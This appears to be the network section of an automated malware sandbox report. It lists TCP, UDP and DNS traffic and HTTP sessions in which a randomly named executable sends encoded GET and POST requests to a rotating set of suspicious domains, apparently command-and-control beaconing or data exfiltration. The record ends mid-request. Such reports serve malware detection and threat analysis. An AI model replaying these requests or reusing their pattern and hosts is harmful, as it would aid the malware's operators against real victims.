Jan 10, 2025 18:15:41.949074984 CET	80	50007	136.243.64.147	192.168.2.10
Jan 10, 2025 18:15:41.949114084 CET	80	50007	136.243.64.147	192.168.2.10
Jan 10, 2025 18:15:41.952594042 CET	50007	80	192.168.2.10	136.243.64.147
Jan 10, 2025 18:15:42.835547924 CET	50007	80	192.168.2.10	136.243.64.147
Jan 10, 2025 18:15:43.856595039 CET	50008	80	192.168.2.10	136.243.64.147
Jan 10, 2025 18:15:43.862952948 CET	80	50008	136.243.64.147	192.168.2.10
Jan 10, 2025 18:15:43.863121986 CET	50008	80	192.168.2.10	136.243.64.147
Jan 10, 2025 18:15:43.872653008 CET	50008	80	192.168.2.10	136.243.64.147
Jan 10, 2025 18:15:43.877477884 CET	80	50008	136.243.64.147	192.168.2.10
Jan 10, 2025 18:15:44.508090973 CET	80	50008	136.243.64.147	192.168.2.10
Jan 10, 2025 18:15:44.508208990 CET	80	50008	136.243.64.147	192.168.2.10
Jan 10, 2025 18:15:44.508368015 CET	50008	80	192.168.2.10	136.243.64.147
Jan 10, 2025 18:15:44.511161089 CET	50008	80	192.168.2.10	136.243.64.147
Jan 10, 2025 18:15:44.515891075 CET	80	50008	136.243.64.147	192.168.2.10
Jan 10, 2025 18:15:49.653001070 CET	50009	80	192.168.2.10	85.159.66.93
Jan 10, 2025 18:15:49.657834053 CET	80	50009	85.159.66.93	192.168.2.10
Jan 10, 2025 18:15:49.657980919 CET	50009	80	192.168.2.10	85.159.66.93
Jan 10, 2025 18:15:49.672657967 CET	50009	80	192.168.2.10	85.159.66.93
Jan 10, 2025 18:15:49.677484035 CET	80	50009	85.159.66.93	192.168.2.10
Jan 10, 2025 18:15:51.183103085 CET	50009	80	192.168.2.10	85.159.66.93
Jan 10, 2025 18:15:51.188088894 CET	80	50009	85.159.66.93	192.168.2.10
Jan 10, 2025 18:15:51.188194036 CET	50009	80	192.168.2.10	85.159.66.93
Jan 10, 2025 18:15:52.200594902 CET	50010	80	192.168.2.10	85.159.66.93
Jan 10, 2025 18:15:52.205955029 CET	80	50010	85.159.66.93	192.168.2.10
Jan 10, 2025 18:15:52.206069946 CET	50010	80	192.168.2.10	85.159.66.93
Jan 10, 2025 18:15:52.224605083 CET	50010	80	192.168.2.10	85.159.66.93
Jan 10, 2025 18:15:52.229947090 CET	80	50010	85.159.66.93	192.168.2.10
Jan 10, 2025 18:15:53.726039886 CET	50010	80	192.168.2.10	85.159.66.93
Jan 10, 2025 18:15:53.731270075 CET	80	50010	85.159.66.93	192.168.2.10
Jan 10, 2025 18:15:53.731362104 CET	50010	80	192.168.2.10	85.159.66.93
Jan 10, 2025 18:15:54.745428085 CET	50011	80	192.168.2.10	85.159.66.93
Jan 10, 2025 18:15:54.750559092 CET	80	50011	85.159.66.93	192.168.2.10
Jan 10, 2025 18:15:54.750767946 CET	50011	80	192.168.2.10	85.159.66.93
Jan 10, 2025 18:15:54.768033028 CET	50011	80	192.168.2.10	85.159.66.93
Jan 10, 2025 18:15:54.772888899 CET	80	50011	85.159.66.93	192.168.2.10
Jan 10, 2025 18:15:54.772964954 CET	80	50011	85.159.66.93	192.168.2.10
Jan 10, 2025 18:15:56.285893917 CET	50011	80	192.168.2.10	85.159.66.93
Jan 10, 2025 18:15:56.291183949 CET	80	50011	85.159.66.93	192.168.2.10
Jan 10, 2025 18:15:56.291321993 CET	50011	80	192.168.2.10	85.159.66.93
Jan 10, 2025 18:15:57.292737961 CET	50012	80	192.168.2.10	85.159.66.93
Jan 10, 2025 18:15:57.297734976 CET	80	50012	85.159.66.93	192.168.2.10
Jan 10, 2025 18:15:57.297848940 CET	50012	80	192.168.2.10	85.159.66.93
Jan 10, 2025 18:15:57.308882952 CET	50012	80	192.168.2.10	85.159.66.93
Jan 10, 2025 18:15:57.313736916 CET	80	50012	85.159.66.93	192.168.2.10
Jan 10, 2025 18:15:58.014405966 CET	80	50012	85.159.66.93	192.168.2.10
Jan 10, 2025 18:15:58.014486074 CET	80	50012	85.159.66.93	192.168.2.10
Jan 10, 2025 18:15:58.015129089 CET	50012	80	192.168.2.10	85.159.66.93
Jan 10, 2025 18:15:58.017932892 CET	50012	80	192.168.2.10	85.159.66.93
Jan 10, 2025 18:15:58.022758007 CET	80	50012	85.159.66.93	192.168.2.10
Jan 10, 2025 18:16:03.029582024 CET	50013	80	192.168.2.10	85.159.66.93
Jan 10, 2025 18:16:03.034653902 CET	80	50013	85.159.66.93	192.168.2.10
Jan 10, 2025 18:16:03.034755945 CET	50013	80	192.168.2.10	85.159.66.93
Jan 10, 2025 18:16:03.052696943 CET	50013	80	192.168.2.10	85.159.66.93
Jan 10, 2025 18:16:03.057532072 CET	80	50013	85.159.66.93	192.168.2.10
Jan 10, 2025 18:16:04.554239988 CET	50013	80	192.168.2.10	85.159.66.93
Jan 10, 2025 18:16:04.559432983 CET	80	50013	85.159.66.93	192.168.2.10
Jan 10, 2025 18:16:04.559573889 CET	50013	80	192.168.2.10	85.159.66.93
Jan 10, 2025 18:16:05.576488972 CET	50014	80	192.168.2.10	85.159.66.93
Jan 10, 2025 18:16:05.581548929 CET	80	50014	85.159.66.93	192.168.2.10
Jan 10, 2025 18:16:05.581718922 CET	50014	80	192.168.2.10	85.159.66.93
Jan 10, 2025 18:16:05.597978115 CET	50014	80	192.168.2.10	85.159.66.93
Jan 10, 2025 18:16:05.603015900 CET	80	50014	85.159.66.93	192.168.2.10
Jan 10, 2025 18:16:07.101182938 CET	50014	80	192.168.2.10	85.159.66.93
Jan 10, 2025 18:16:07.108907938 CET	80	50014	85.159.66.93	192.168.2.10
Jan 10, 2025 18:16:07.108983994 CET	50014	80	192.168.2.10	85.159.66.93
Jan 10, 2025 18:16:08.120052099 CET	50015	80	192.168.2.10	85.159.66.93
Jan 10, 2025 18:16:08.124967098 CET	80	50015	85.159.66.93	192.168.2.10
Jan 10, 2025 18:16:08.127784967 CET	50015	80	192.168.2.10	85.159.66.93
Jan 10, 2025 18:16:08.143644094 CET	50015	80	192.168.2.10	85.159.66.93
Jan 10, 2025 18:16:08.148562908 CET	80	50015	85.159.66.93	192.168.2.10
Jan 10, 2025 18:16:08.148607969 CET	80	50015	85.159.66.93	192.168.2.10
Jan 10, 2025 18:16:09.648013115 CET	50015	80	192.168.2.10	85.159.66.93
Jan 10, 2025 18:16:09.653322935 CET	80	50015	85.159.66.93	192.168.2.10
Jan 10, 2025 18:16:09.653430939 CET	50015	80	192.168.2.10	85.159.66.93
Jan 10, 2025 18:16:10.724622965 CET	50016	80	192.168.2.10	85.159.66.93
Jan 10, 2025 18:16:10.729562998 CET	80	50016	85.159.66.93	192.168.2.10
Jan 10, 2025 18:16:10.733328104 CET	50016	80	192.168.2.10	85.159.66.93
Jan 10, 2025 18:16:10.941294909 CET	50016	80	192.168.2.10	85.159.66.93
Jan 10, 2025 18:16:10.946305990 CET	80	50016	85.159.66.93	192.168.2.10
Jan 10, 2025 18:16:11.436729908 CET	80	50016	85.159.66.93	192.168.2.10
Jan 10, 2025 18:16:11.436753988 CET	80	50016	85.159.66.93	192.168.2.10
Jan 10, 2025 18:16:11.436929941 CET	50016	80	192.168.2.10	85.159.66.93
Jan 10, 2025 18:16:11.440475941 CET	50016	80	192.168.2.10	85.159.66.93
Jan 10, 2025 18:16:11.445256948 CET	80	50016	85.159.66.93	192.168.2.10
Jan 10, 2025 18:16:16.574106932 CET	50017	80	192.168.2.10	13.228.81.39
Jan 10, 2025 18:16:16.579031944 CET	80	50017	13.228.81.39	192.168.2.10
Jan 10, 2025 18:16:16.580728054 CET	50017	80	192.168.2.10	13.228.81.39
Jan 10, 2025 18:16:16.694752932 CET	50017	80	192.168.2.10	13.228.81.39
Jan 10, 2025 18:16:16.699779034 CET	80	50017	13.228.81.39	192.168.2.10
Jan 10, 2025 18:16:17.529623985 CET	80	50017	13.228.81.39	192.168.2.10
Jan 10, 2025 18:16:17.529654026 CET	80	50017	13.228.81.39	192.168.2.10
Jan 10, 2025 18:16:17.529701948 CET	50017	80	192.168.2.10	13.228.81.39
Jan 10, 2025 18:16:18.210751057 CET	50017	80	192.168.2.10	13.228.81.39
Jan 10, 2025 18:16:19.231695890 CET	50018	80	192.168.2.10	13.228.81.39
Jan 10, 2025 18:16:19.236679077 CET	80	50018	13.228.81.39	192.168.2.10
Jan 10, 2025 18:16:19.236767054 CET	50018	80	192.168.2.10	13.228.81.39
Jan 10, 2025 18:16:19.261136055 CET	50018	80	192.168.2.10	13.228.81.39
Jan 10, 2025 18:16:19.266002893 CET	80	50018	13.228.81.39	192.168.2.10
Jan 10, 2025 18:16:20.233159065 CET	80	50018	13.228.81.39	192.168.2.10
Jan 10, 2025 18:16:20.233357906 CET	80	50018	13.228.81.39	192.168.2.10
Jan 10, 2025 18:16:20.233716011 CET	50018	80	192.168.2.10	13.228.81.39
Jan 10, 2025 18:16:20.775058031 CET	50018	80	192.168.2.10	13.228.81.39
Jan 10, 2025 18:16:21.792020082 CET	50019	80	192.168.2.10	13.228.81.39
Jan 10, 2025 18:16:21.796916008 CET	80	50019	13.228.81.39	192.168.2.10
Jan 10, 2025 18:16:21.797108889 CET	50019	80	192.168.2.10	13.228.81.39
Jan 10, 2025 18:16:21.814047098 CET	50019	80	192.168.2.10	13.228.81.39
Jan 10, 2025 18:16:21.818810940 CET	80	50019	13.228.81.39	192.168.2.10
Jan 10, 2025 18:16:21.818969011 CET	80	50019	13.228.81.39	192.168.2.10
Jan 10, 2025 18:16:22.746313095 CET	80	50019	13.228.81.39	192.168.2.10
Jan 10, 2025 18:16:22.746337891 CET	80	50019	13.228.81.39	192.168.2.10
Jan 10, 2025 18:16:22.746424913 CET	50019	80	192.168.2.10	13.228.81.39
Jan 10, 2025 18:16:23.319845915 CET	50019	80	192.168.2.10	13.228.81.39
Jan 10, 2025 18:16:24.339168072 CET	50020	80	192.168.2.10	13.228.81.39
Jan 10, 2025 18:16:24.344264030 CET	80	50020	13.228.81.39	192.168.2.10
Jan 10, 2025 18:16:24.344414949 CET	50020	80	192.168.2.10	13.228.81.39
Jan 10, 2025 18:16:24.354099989 CET	50020	80	192.168.2.10	13.228.81.39
Jan 10, 2025 18:16:24.358927011 CET	80	50020	13.228.81.39	192.168.2.10
Jan 10, 2025 18:16:25.313288927 CET	80	50020	13.228.81.39	192.168.2.10
Jan 10, 2025 18:16:25.313313007 CET	80	50020	13.228.81.39	192.168.2.10
Jan 10, 2025 18:16:25.313448906 CET	50020	80	192.168.2.10	13.228.81.39
Jan 10, 2025 18:16:25.317579031 CET	50020	80	192.168.2.10	13.228.81.39
Jan 10, 2025 18:16:25.322433949 CET	80	50020	13.228.81.39	192.168.2.10
Jan 10, 2025 18:16:30.382605076 CET	50021	80	192.168.2.10	188.114.96.3
Jan 10, 2025 18:16:30.387448072 CET	80	50021	188.114.96.3	192.168.2.10
Jan 10, 2025 18:16:30.391500950 CET	50021	80	192.168.2.10	188.114.96.3
Jan 10, 2025 18:16:30.407361984 CET	50021	80	192.168.2.10	188.114.96.3
Jan 10, 2025 18:16:30.412188053 CET	80	50021	188.114.96.3	192.168.2.10
Jan 10, 2025 18:16:30.975791931 CET	80	50021	188.114.96.3	192.168.2.10
Jan 10, 2025 18:16:30.975949049 CET	80	50021	188.114.96.3	192.168.2.10
Jan 10, 2025 18:16:30.975997925 CET	50021	80	192.168.2.10	188.114.96.3
Jan 10, 2025 18:16:30.977267981 CET	80	50021	188.114.96.3	192.168.2.10
Jan 10, 2025 18:16:30.977319002 CET	50021	80	192.168.2.10	188.114.96.3
Jan 10, 2025 18:16:31.913629055 CET	50021	80	192.168.2.10	188.114.96.3
Jan 10, 2025 18:16:32.933406115 CET	50022	80	192.168.2.10	188.114.96.3
Jan 10, 2025 18:16:32.938973904 CET	80	50022	188.114.96.3	192.168.2.10
Jan 10, 2025 18:16:32.939059019 CET	50022	80	192.168.2.10	188.114.96.3
Jan 10, 2025 18:16:32.959580898 CET	50022	80	192.168.2.10	188.114.96.3
Jan 10, 2025 18:16:32.964461088 CET	80	50022	188.114.96.3	192.168.2.10
Jan 10, 2025 18:16:33.510116100 CET	80	50022	188.114.96.3	192.168.2.10
Jan 10, 2025 18:16:33.510185003 CET	80	50022	188.114.96.3	192.168.2.10
Jan 10, 2025 18:16:33.510238886 CET	50022	80	192.168.2.10	188.114.96.3
Jan 10, 2025 18:16:33.510412931 CET	80	50022	188.114.96.3	192.168.2.10
Jan 10, 2025 18:16:33.510462999 CET	50022	80	192.168.2.10	188.114.96.3
Jan 10, 2025 18:16:34.476079941 CET	50022	80	192.168.2.10	188.114.96.3
Jan 10, 2025 18:16:35.500583887 CET	50023	80	192.168.2.10	188.114.96.3
Jan 10, 2025 18:16:35.505989075 CET	80	50023	188.114.96.3	192.168.2.10
Jan 10, 2025 18:16:35.506083012 CET	50023	80	192.168.2.10	188.114.96.3
Jan 10, 2025 18:16:35.535732031 CET	50023	80	192.168.2.10	188.114.96.3
Jan 10, 2025 18:16:35.540595055 CET	80	50023	188.114.96.3	192.168.2.10
Jan 10, 2025 18:16:35.541054010 CET	80	50023	188.114.96.3	192.168.2.10
Jan 10, 2025 18:16:36.091031075 CET	80	50023	188.114.96.3	192.168.2.10
Jan 10, 2025 18:16:36.091054916 CET	80	50023	188.114.96.3	192.168.2.10
Jan 10, 2025 18:16:36.091341019 CET	50023	80	192.168.2.10	188.114.96.3
Jan 10, 2025 18:16:36.094003916 CET	80	50023	188.114.96.3	192.168.2.10
Jan 10, 2025 18:16:36.094038963 CET	80	50023	188.114.96.3	192.168.2.10
Jan 10, 2025 18:16:36.094166040 CET	50023	80	192.168.2.10	188.114.96.3
Jan 10, 2025 18:16:37.039863110 CET	50023	80	192.168.2.10	188.114.96.3
Jan 10, 2025 18:16:38.058696985 CET	50024	80	192.168.2.10	188.114.96.3
Jan 10, 2025 18:16:38.063489914 CET	80	50024	188.114.96.3	192.168.2.10
Jan 10, 2025 18:16:38.069933891 CET	50024	80	192.168.2.10	188.114.96.3
Jan 10, 2025 18:16:38.079073906 CET	50024	80	192.168.2.10	188.114.96.3
Jan 10, 2025 18:16:38.085815907 CET	80	50024	188.114.96.3	192.168.2.10
Jan 10, 2025 18:16:38.675014019 CET	80	50024	188.114.96.3	192.168.2.10
Jan 10, 2025 18:16:38.676594973 CET	80	50024	188.114.96.3	192.168.2.10
Jan 10, 2025 18:16:38.676743031 CET	50024	80	192.168.2.10	188.114.96.3
Jan 10, 2025 18:16:38.678930044 CET	50024	80	192.168.2.10	188.114.96.3
Jan 10, 2025 18:16:38.688910961 CET	80	50024	188.114.96.3	192.168.2.10
Jan 10, 2025 18:16:46.804656029 CET	50025	80	192.168.2.10	3.33.130.190
Jan 10, 2025 18:16:46.809519053 CET	80	50025	3.33.130.190	192.168.2.10
Jan 10, 2025 18:16:46.810065031 CET	50025	80	192.168.2.10	3.33.130.190
Jan 10, 2025 18:16:46.820657015 CET	50025	80	192.168.2.10	3.33.130.190
Jan 10, 2025 18:16:46.825407982 CET	80	50025	3.33.130.190	192.168.2.10

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 10, 2025 18:13:14.970933914 CET	57414	53	192.168.2.10	1.1.1.1
Jan 10, 2025 18:13:15.131530046 CET	53	57414	1.1.1.1	192.168.2.10
Jan 10, 2025 18:13:30.651305914 CET	61802	53	192.168.2.10	1.1.1.1
Jan 10, 2025 18:13:30.667128086 CET	53	61802	1.1.1.1	192.168.2.10
Jan 10, 2025 18:13:38.729660988 CET	55362	53	192.168.2.10	1.1.1.1
Jan 10, 2025 18:13:39.004712105 CET	53	55362	1.1.1.1	192.168.2.10
Jan 10, 2025 18:13:52.151344061 CET	51902	53	192.168.2.10	1.1.1.1
Jan 10, 2025 18:13:52.168838024 CET	53	51902	1.1.1.1	192.168.2.10
Jan 10, 2025 18:14:06.573040962 CET	59959	53	192.168.2.10	1.1.1.1
Jan 10, 2025 18:14:06.770278931 CET	53	59959	1.1.1.1	192.168.2.10
Jan 10, 2025 18:14:20.214493036 CET	52306	53	192.168.2.10	1.1.1.1
Jan 10, 2025 18:14:20.302141905 CET	53	52306	1.1.1.1	192.168.2.10
Jan 10, 2025 18:14:28.356210947 CET	56008	53	192.168.2.10	1.1.1.1
Jan 10, 2025 18:14:28.971431971 CET	53	56008	1.1.1.1	192.168.2.10
Jan 10, 2025 18:14:42.824683905 CET	64139	53	192.168.2.10	1.1.1.1
Jan 10, 2025 18:14:42.908819914 CET	53	64139	1.1.1.1	192.168.2.10
Jan 10, 2025 18:14:50.965388060 CET	52509	53	192.168.2.10	1.1.1.1
Jan 10, 2025 18:14:50.977113962 CET	53	52509	1.1.1.1	192.168.2.10
Jan 10, 2025 18:15:04.248585939 CET	52892	53	192.168.2.10	1.1.1.1
Jan 10, 2025 18:15:04.261991024 CET	53	52892	1.1.1.1	192.168.2.10
Jan 10, 2025 18:15:22.457628012 CET	60647	53	192.168.2.10	1.1.1.1
Jan 10, 2025 18:15:22.474528074 CET	53	60647	1.1.1.1	192.168.2.10
Jan 10, 2025 18:15:35.635715008 CET	61456	53	192.168.2.10	1.1.1.1
Jan 10, 2025 18:15:36.201359987 CET	53	61456	1.1.1.1	192.168.2.10
Jan 10, 2025 18:15:49.527645111 CET	64756	53	192.168.2.10	1.1.1.1
Jan 10, 2025 18:15:49.650259972 CET	53	64756	1.1.1.1	192.168.2.10
Jan 10, 2025 18:16:16.506726980 CET	49628	53	192.168.2.10	1.1.1.1
Jan 10, 2025 18:16:16.536412954 CET	53	49628	1.1.1.1	192.168.2.10
Jan 10, 2025 18:16:30.323331118 CET	60569	53	192.168.2.10	1.1.1.1
Jan 10, 2025 18:16:30.377816916 CET	53	60569	1.1.1.1	192.168.2.10

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 10, 2025 18:13:14.970933914 CET	192.168.2.10	1.1.1.1	0xc54b	Standard query (0)	www.champs-cloud.systems	A (IP address)	IN (0x0001)	false
Jan 10, 2025 18:13:30.651305914 CET	192.168.2.10	1.1.1.1	0x30f	Standard query (0)	www.samehadaku.red	A (IP address)	IN (0x0001)	false
Jan 10, 2025 18:13:38.729660988 CET	192.168.2.10	1.1.1.1	0x2f51	Standard query (0)	www.tabo.group	A (IP address)	IN (0x0001)	false
Jan 10, 2025 18:13:52.151344061 CET	192.168.2.10	1.1.1.1	0xd5c	Standard query (0)	www.ripbgs.info	A (IP address)	IN (0x0001)	false
Jan 10, 2025 18:14:06.573040962 CET	192.168.2.10	1.1.1.1	0xd984	Standard query (0)	www.furrcali.xyz	A (IP address)	IN (0x0001)	false
Jan 10, 2025 18:14:20.214493036 CET	192.168.2.10	1.1.1.1	0x3fc8	Standard query (0)	www.smartbath.shop	A (IP address)	IN (0x0001)	false
Jan 10, 2025 18:14:28.356210947 CET	192.168.2.10	1.1.1.1	0xaa06	Standard query (0)	www.y6h6kn.top	A (IP address)	IN (0x0001)	false
Jan 10, 2025 18:14:42.824683905 CET	192.168.2.10	1.1.1.1	0x48f6	Standard query (0)	www.bellhomehd.shop	A (IP address)	IN (0x0001)	false
Jan 10, 2025 18:14:50.965388060 CET	192.168.2.10	1.1.1.1	0x46f4	Standard query (0)	www.digitalpath.website	A (IP address)	IN (0x0001)	false
Jan 10, 2025 18:15:04.248585939 CET	192.168.2.10	1.1.1.1	0x43c9	Standard query (0)	www.bonheur.tech	A (IP address)	IN (0x0001)	false
Jan 10, 2025 18:15:22.457628012 CET	192.168.2.10	1.1.1.1	0x3df	Standard query (0)	www.londonatnight.coffee	A (IP address)	IN (0x0001)	false
Jan 10, 2025 18:15:35.635715008 CET	192.168.2.10	1.1.1.1	0x3b02	Standard query (0)	www.100millionjobs.africa	A (IP address)	IN (0x0001)	false
Jan 10, 2025 18:15:49.527645111 CET	192.168.2.10	1.1.1.1	0x6fb4	Standard query (0)	www.letsbookcruise.xyz	A (IP address)	IN (0x0001)	false
Jan 10, 2025 18:16:16.506726980 CET	192.168.2.10	1.1.1.1	0xffa9	Standard query (0)	www.erexolsk.shop	A (IP address)	IN (0x0001)	false
Jan 10, 2025 18:16:30.323331118 CET	192.168.2.10	1.1.1.1	0x8d7b	Standard query (0)	www.cifasnc.info	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jan 10, 2025 18:13:15.131530046 CET	1.1.1.1	192.168.2.10	0xc54b	No error (0)	www.champs-cloud.systems	champs-cloud.systems		CNAME (Canonical name)	IN (0x0001)	false
Jan 10, 2025 18:13:15.131530046 CET	1.1.1.1	192.168.2.10	0xc54b	No error (0)	champs-cloud.systems		3.33.130.190	A (IP address)	IN (0x0001)	false
Jan 10, 2025 18:13:15.131530046 CET	1.1.1.1	192.168.2.10	0xc54b	No error (0)	champs-cloud.systems		15.197.148.33	A (IP address)	IN (0x0001)	false
Jan 10, 2025 18:13:30.667128086 CET	1.1.1.1	192.168.2.10	0x30f	Name error (3)	www.samehadaku.red	none	none	A (IP address)	IN (0x0001)	false
Jan 10, 2025 18:13:39.004712105 CET	1.1.1.1	192.168.2.10	0x2f51	No error (0)	www.tabo.group		13.248.169.48	A (IP address)	IN (0x0001)	false
Jan 10, 2025 18:13:39.004712105 CET	1.1.1.1	192.168.2.10	0x2f51	No error (0)	www.tabo.group		76.223.54.146	A (IP address)	IN (0x0001)	false
Jan 10, 2025 18:13:52.168838024 CET	1.1.1.1	192.168.2.10	0xd5c	No error (0)	www.ripbgs.info		47.83.1.90	A (IP address)	IN (0x0001)	false
Jan 10, 2025 18:14:06.770278931 CET	1.1.1.1	192.168.2.10	0xd984	No error (0)	www.furrcali.xyz		103.106.67.112	A (IP address)	IN (0x0001)	false
Jan 10, 2025 18:14:20.302141905 CET	1.1.1.1	192.168.2.10	0x3fc8	Name error (3)	www.smartbath.shop	none	none	A (IP address)	IN (0x0001)	false
Jan 10, 2025 18:14:28.971431971 CET	1.1.1.1	192.168.2.10	0xaa06	No error (0)	www.y6h6kn.top		103.23.149.28	A (IP address)	IN (0x0001)	false
Jan 10, 2025 18:14:28.971431971 CET	1.1.1.1	192.168.2.10	0xaa06	No error (0)	www.y6h6kn.top		162.251.95.62	A (IP address)	IN (0x0001)	false
Jan 10, 2025 18:14:42.908819914 CET	1.1.1.1	192.168.2.10	0x48f6	Name error (3)	www.bellhomehd.shop	none	none	A (IP address)	IN (0x0001)	false
Jan 10, 2025 18:14:50.977113962 CET	1.1.1.1	192.168.2.10	0x46f4	No error (0)	www.digitalpath.website		162.0.236.169	A (IP address)	IN (0x0001)	false
Jan 10, 2025 18:15:04.261991024 CET	1.1.1.1	192.168.2.10	0x43c9	No error (0)	www.bonheur.tech		13.248.169.48	A (IP address)	IN (0x0001)	false
Jan 10, 2025 18:15:04.261991024 CET	1.1.1.1	192.168.2.10	0x43c9	No error (0)	www.bonheur.tech		76.223.54.146	A (IP address)	IN (0x0001)	false
Jan 10, 2025 18:15:22.474528074 CET	1.1.1.1	192.168.2.10	0x3df	No error (0)	www.londonatnight.coffee		13.248.169.48	A (IP address)	IN (0x0001)	false
Jan 10, 2025 18:15:22.474528074 CET	1.1.1.1	192.168.2.10	0x3df	No error (0)	www.londonatnight.coffee		76.223.54.146	A (IP address)	IN (0x0001)	false
Jan 10, 2025 18:15:36.201359987 CET	1.1.1.1	192.168.2.10	0x3b02	No error (0)	www.100millionjobs.africa	100millionjobs.africa		CNAME (Canonical name)	IN (0x0001)	false
Jan 10, 2025 18:15:36.201359987 CET	1.1.1.1	192.168.2.10	0x3b02	No error (0)	100millionjobs.africa		136.243.64.147	A (IP address)	IN (0x0001)	false
Jan 10, 2025 18:15:49.650259972 CET	1.1.1.1	192.168.2.10	0x6fb4	No error (0)	www.letsbookcruise.xyz	redirect.natrocdn.com		CNAME (Canonical name)	IN (0x0001)	false
Jan 10, 2025 18:15:49.650259972 CET	1.1.1.1	192.168.2.10	0x6fb4	No error (0)	redirect.natrocdn.com	natroredirect.natrocdn.com		CNAME (Canonical name)	IN (0x0001)	false
Jan 10, 2025 18:15:49.650259972 CET	1.1.1.1	192.168.2.10	0x6fb4	No error (0)	natroredirect.natrocdn.com		85.159.66.93	A (IP address)	IN (0x0001)	false
Jan 10, 2025 18:16:16.536412954 CET	1.1.1.1	192.168.2.10	0xffa9	No error (0)	www.erexolsk.shop	dns.ladipage.com		CNAME (Canonical name)	IN (0x0001)	false
Jan 10, 2025 18:16:16.536412954 CET	1.1.1.1	192.168.2.10	0xffa9	No error (0)	dns.ladipage.com		13.228.81.39	A (IP address)	IN (0x0001)	false
Jan 10, 2025 18:16:16.536412954 CET	1.1.1.1	192.168.2.10	0xffa9	No error (0)	dns.ladipage.com		18.139.62.226	A (IP address)	IN (0x0001)	false
Jan 10, 2025 18:16:30.377816916 CET	1.1.1.1	192.168.2.10	0x8d7b	No error (0)	www.cifasnc.info		188.114.96.3	A (IP address)	IN (0x0001)	false
Jan 10, 2025 18:16:30.377816916 CET	1.1.1.1	192.168.2.10	0x8d7b	No error (0)	www.cifasnc.info		188.114.97.3	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

www.champs-cloud.systems

www.tabo.group

www.ripbgs.info

www.furrcali.xyz

www.y6h6kn.top

www.digitalpath.website

www.bonheur.tech

www.londonatnight.coffee

www.100millionjobs.africa

www.letsbookcruise.xyz

www.erexolsk.shop

www.cifasnc.info

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.10	49896	3.33.130.190	80	2404	C:\Program Files (x86)\TOwdrVmwSMtIzbKoEPfEqDHyqbUsqXMMWSPJpBvzXOXYrZXbwwgrghrHBivqWprCGWDHesrYs\krQctklhjIp.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 18:13:15.153170109 CET	484	OUT	GET /kt5b/?SDC=7sHsF0emfu3XBQ/jtFc60bzIUziWjTzDb0qmDF0qYFonYHCCAy09ZYE2TtsqBj+MZwW/uNpm4bfZrR+4SyFJtzDsidCuj5jdbNH0Ax+BPwx+K6LGFw==&mH=CpePy0P HTTP/1.1 Host: www.champs-cloud.systems Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.9 Connection: close User-Agent: Mozilla/5.0 (Linux; U; Android 4.4; en-us; Nexus 4 Build/JOP24G) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
Jan 10, 2025 18:13:15.603010893 CET	367	IN	HTTP/1.1 200 OK content-type: text/html date: Fri, 10 Jan 2025 17:13:15 GMT content-length: 246 connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 53 44 43 3d 37 73 48 73 46 30 65 6d 66 75 33 58 42 51 2f 6a 74 46 63 36 30 62 7a 49 55 7a 69 57 6a 54 7a 44 62 30 71 6d 44 46 30 71 59 46 6f 6e 59 48 43 43 41 79 30 39 5a 59 45 32 54 74 73 71 42 6a 2b 4d 5a 77 57 2f 75 4e 70 6d 34 62 66 5a 72 52 2b 34 53 79 46 4a 74 7a 44 73 69 64 43 75 6a 35 6a 64 62 4e 48 30 41 78 2b 42 50 77 78 2b 4b 36 4c 47 46 77 3d 3d 26 6d 48 3d 43 70 65 50 79 30 50 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?SDC=7sHsF0emfu3XBQ/jtFc60bzIUziWjTzDb0qmDF0qYFonYHCCAy09ZYE2TtsqBj+MZwW/uNpm4bfZrR+4SyFJtzDsidCuj5jdbNH0Ax+BPwx+K6LGFw==&mH=CpePy0P"}</script></head></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.10	49977	13.248.169.48	80	2404	C:\Program Files (x86)\TOwdrVmwSMtIzbKoEPfEqDHyqbUsqXMMWSPJpBvzXOXYrZXbwwgrghrHBivqWprCGWDHesrYs\krQctklhjIp.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 18:13:39.027168989 CET	735	OUT	POST /danh/ HTTP/1.1 Host: www.tabo.group Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Origin: http://www.tabo.group Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Content-Length: 192 Connection: close Referer: http://www.tabo.group/danh/ User-Agent: Mozilla/5.0 (Linux; U; Android 4.4; en-us; Nexus 4 Build/JOP24G) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30 Data Raw: 53 44 43 3d 6b 6e 33 2b 47 74 77 4d 6c 2f 39 4f 55 41 42 2f 30 5a 53 74 61 56 4f 43 57 33 64 33 66 78 53 5a 34 30 61 4e 76 56 4f 57 43 77 6b 6d 2f 5a 61 4a 2f 37 59 65 2b 47 56 4e 5a 76 51 34 55 44 50 6b 67 71 76 41 36 71 4d 74 63 39 49 64 34 74 2f 35 4b 33 77 42 57 69 76 4a 58 66 74 41 57 64 67 66 70 70 62 41 5a 37 49 51 41 36 54 33 7a 73 56 61 38 54 64 6d 6c 30 77 7a 7a 54 37 6a 7a 77 4e 35 6c 37 6e 35 4f 6a 36 72 